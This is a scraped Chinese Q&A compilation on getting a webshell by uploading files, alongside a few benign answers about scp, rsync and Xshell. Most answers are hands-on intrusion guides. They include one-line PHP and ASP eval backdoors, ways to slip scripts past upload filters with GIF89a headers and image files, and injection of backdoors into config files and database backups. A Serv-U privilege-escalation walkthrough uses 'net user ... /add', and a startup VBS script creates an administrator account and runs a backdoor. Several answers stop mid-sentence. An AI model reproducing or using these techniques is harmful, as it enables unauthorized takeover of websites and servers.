當前位置:首頁 » 文件管理 » 上傳拿shell

上傳拿shell

發布時間: 2022-12-11 04:17:07

『壹』 使用shell腳本批量上傳文件

1、設置ssh無密碼訪問
2、用scp -R ,例如
scp -R /root/tmp root@server:/root
3、或者用rsync命令,例如
#!/bin/sh
/usr/bin/rsync -av '-e ssh -p 22' [email protected]:/root/tmp /root/

『貳』 後台能上傳圖片,怎麼拿shell

1、文件頭+GIF89a法。(php)//這個很好理解,直接在php馬最前面寫入gif89a,然後上傳dama.php
2、使用edjpgcom工具注入代碼。(php)//edjpgcom修改,加入php一句話保存為dama.php
3、cmd命令下 圖片.GIF+shell.php webshell.php (php) //估計和1是同樣的原理,欺騙上傳webshell.php
4、C32asm打開圖片在文件末尾空一格加入代碼<?php eval($_POST[cmd])?> 。(php)//填充php一句話然後上傳。

『叄』 黑客們常說的 拿到shell、 shell是什麼意思 同理求問WEBSHELL是什麼

在計算機科學中,Shell俗稱殼(用來區別於核),是指「提供使用者使用界面」的軟體(命令解析器)。用途 一般情況下: 使用用戶的預設憑證和環境執行 shell。shell 命令重新初始化用戶的登錄會話。當給出該命令時,就會重新設置進程的控制終端的埠特徵,並取消對埠的所有訪問。然後 shell 命令為用戶把進程憑證和環境重新設置為預設值,並執行用戶的初始程序。根據調用進程的登錄用戶標識建立所有的憑證和環境。
"web" - 顯然需要伺服器開放web服務,"shell" - 取得對伺服器某種程度上操作許可權。

webshell常常被稱為匿名用戶(入侵者)通過WEB服務埠對WEB伺服器有某種程度上操作的許可權,由於其大多是以網頁腳本的形式出現,也有人稱之為網站後門工具。
webshell有什麼作用?

一方面,webshell被站長常常用於網站管理、伺服器管理等等,根據FSO許可權的不同,作用有在線編輯網頁腳本、上傳下載文件、查看資料庫、執行任意程序命令等。

另一方面,被入侵者利用,從而達到控制網站伺服器的目的。這些網頁腳本常稱為WEB

腳本木馬,目前比較流行的asp或php木馬,也有基於.NET的腳本木馬。

『肆』 已經傳上大馬,怎麼拿shell,直至提權

第一
如果伺服器上有裝了pcanywhere服務端,管理員為了管理方便
也給了我們方便,到系統盤的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下載*.cif本地
破解就使用pcanywhere連接就ok了

第二
有很多小黑問我這么把webshell的iis user許可權提升
一般伺服器的管理都是本機設計完畢然後上傳到空間里,
那麼就會用到ftp,伺服器使用最多的就是servu
那麼我們就利用servu來提升許可權
通過servu提升許可權需要servu安裝目錄可寫~

好開始把,首先通過webshell訪問servu安裝文件夾下的ServUDaemon.ini把他下載
下來,然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝文件夾下覆蓋,
啟動servu添加了一個用戶,設置為系統管理員,目錄C:\,具有可執行許可權
然後去servu安裝目錄里把ServUDaemon.ini更換伺服器上的。
用我新建的用戶和密碼連接~
好的,還是連上了

ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //剛才添加的用戶
331 User name okay, please send complete E-mail address as password.
Password:password //密碼
230 User logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄
250 Directory changed to /WINNT
ftp>cd system32 //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系統的net.exe

文件加用戶。
如果提示沒有許可權,那我們就
把後門(server.exe) 傳他system32目錄
然後寫一個VBs教本

set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)

存為xx.vbe
這個教本的作用是建立user用戶密碼為pass
並且提升為管理員
然後執行system32目錄下的server.exe
把這個教本傳他 C:\Documents and Settings\All Users\「開始」菜單\程序\啟動
目錄
這樣管理員只要一登陸就會執行那個教本.
接下來就是等了.等他登陸.

第三

就是先檢查有什麼系統服務,或者隨系統啟動自動啟動的程序和管理員經常使用的軟體, 比如諾頓,VAdministrator,金山,瑞星,WinRAR甚至QQ之類的,是否可以寫,如果可以就修改其程序, 綁定一個批處理或者VBS,然後還是等待伺服器重啟。

第四

查找conn和config ,pass這類型的文件看能否得到sa或者mysql的相關密碼,可能會有所
收獲等等。

第五

使用Flashfxp也能提升許可權,但是成功率就看你自己的運氣了
首先找到FlashFXP文件夾,打開(編輯)Sites. dat,這個文件這是什麼東西密碼和用戶名,
而且密碼是

『伍』 xshell怎麼上傳文件到伺服器

對於Linux用戶來說,經常會使用到Xshell這個遠程管理軟體,比如會藉助Xshell向Linux伺服器上傳文件,那麼作為新手,肯定還不知道怎麼操作,具體步驟如下:

步驟一:登錄Linux伺服器。打開Xshell,新建會話輸入相應的主機名稱和IP,登錄Linux伺服器。


圖6:選擇上傳的文件

按照上面的步驟操作,就可以使用Xshell上傳文件到伺服器了,主要藉助lrzsz實現Windows客戶端向Linux伺服器上傳文件,從而實現快速上傳文件,更多使用技巧可以訪問Xshell中文官網。

『陸』 iis7.5怎麼上傳拿shell

很容易的,
烏龍寺技術站

『柒』 自己網站怎麼拿WEBSHELL

一、直接上傳獲得webshell
這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標管理上傳.php類型,雖然沒有提示,其實已經成功了,上傳的文 件url應該是http://forums/images/smiles/下,前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog後台可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統),因過濾上傳文件不嚴,導致用戶可以直接上傳webshell到網站任意可寫目錄中,從而拿到網站的管理員控制許可權。
二、添加修改上傳類型
現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數的系統是允許添加上傳類型,bbsxp後台可以添加asa|asP類型,ewebeditor的後台也可添加asa類型,通過修改後我們可以直接上傳asa後綴的webshell了,還有一種情況是過濾了.asp,可以添加.aspasp的文件類型來上傳獲得webshell。php系統的後台,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最後的哪個只要不是已知的文件類型即可,php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14後台獲得webshell方法是:在上傳類型中增加asp ,注意,asp後面是有個空格的,然後在前台上傳ASP馬,當然也要在後面加個空格!
三、利用後台管理功能寫入webshell
上傳漏洞基本上補的也差不多了,所以我們進入後台後還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0,還有leadbbs2.88等,直接在後台修改配置文件,寫入後綴是asp的文件。而LeadBbs3.14後台獲得webshell另一方法是:添加一個新的友情鏈接,在網站名稱處寫上冰狐最小馬即可,最小馬前後要隨便輸入一些字元,http:\\網站\inc\IncHtm\BoardLink.asp就是我們想要的shell。
四、利用後台管理向配置文件寫webshell
利用"""":""//"等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以,COCOON Counter統計程序舉例,在管理郵箱處添上cnhacker at 263 dot net":eval request(chr (35))//, 在配製文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",還有一種方法就是寫上cnhacker at 263 dot net"%><%eval request(chr(35))%><%',這樣就會形成前後對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話馬"%><%execute request("l")%><%',保存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。
五、利用後台資料庫備份及恢復獲得webshell
主要是利用後台對access資料庫的「備份資料庫」或「恢復資料庫」功能,「備份的資料庫路徑」等變數沒有過濾導致可以把任意文件後綴改 為asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。還可以備份網站asp文件為其他後綴 如.txt文件,從而可以查看並獲得網頁源代碼,並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候,但是有asp系統在運行,利用此方法來查看源代碼來獲得其資料庫的位置,為資料庫插馬來創造機會,動網論壇就有一個ip地址的資料庫,在後台的ip管理中可以插入最小馬然後備份成.asp文件即可。在談談突破上傳檢測的方法,很多asp程序在即使改了後綴名後也會提示文件非法,通過在.asp文件頭加上gif89a修改後綴為gif來騙過asp程序檢測達到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分復制到asp木馬文件頭,修改gif後綴後上傳也可以突破檢測,然後備份為.asp文件,成功得到webshell。
六、利用資料庫壓縮功能
可以將數據的防下載失效從而使插入資料庫的最小馬成功運行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交後,在資料庫操作中壓縮資料庫,可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個webshell。
七、asp+mssql系統
這里需要提一點動網mssql版,但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片,然後記住其上傳路徑。寫一個本地提交的表單

熱點內容
演算法股市 發布:2025-08-01 01:53:37 瀏覽:84
銀行密碼器需要多少錢 發布:2025-08-01 01:53:33 瀏覽:832
mysql自動化腳本 發布:2025-08-01 01:53:01 瀏覽:351
老電腦怎麼配置組裝 發布:2025-08-01 01:45:09 瀏覽:453
如何用gcc語言編譯代碼 發布:2025-08-01 01:37:57 瀏覽:237
android的分區大小 發布:2025-08-01 01:37:54 瀏覽:12
linuxdeploy 發布:2025-08-01 01:17:01 瀏覽:353
linux伺服器埠號怎麼設置 發布:2025-08-01 01:15:22 瀏覽:14
乾花膠怎麼存儲 發布:2025-08-01 01:11:14 瀏覽:524
g4編程 發布:2025-08-01 01:10:24 瀏覽:534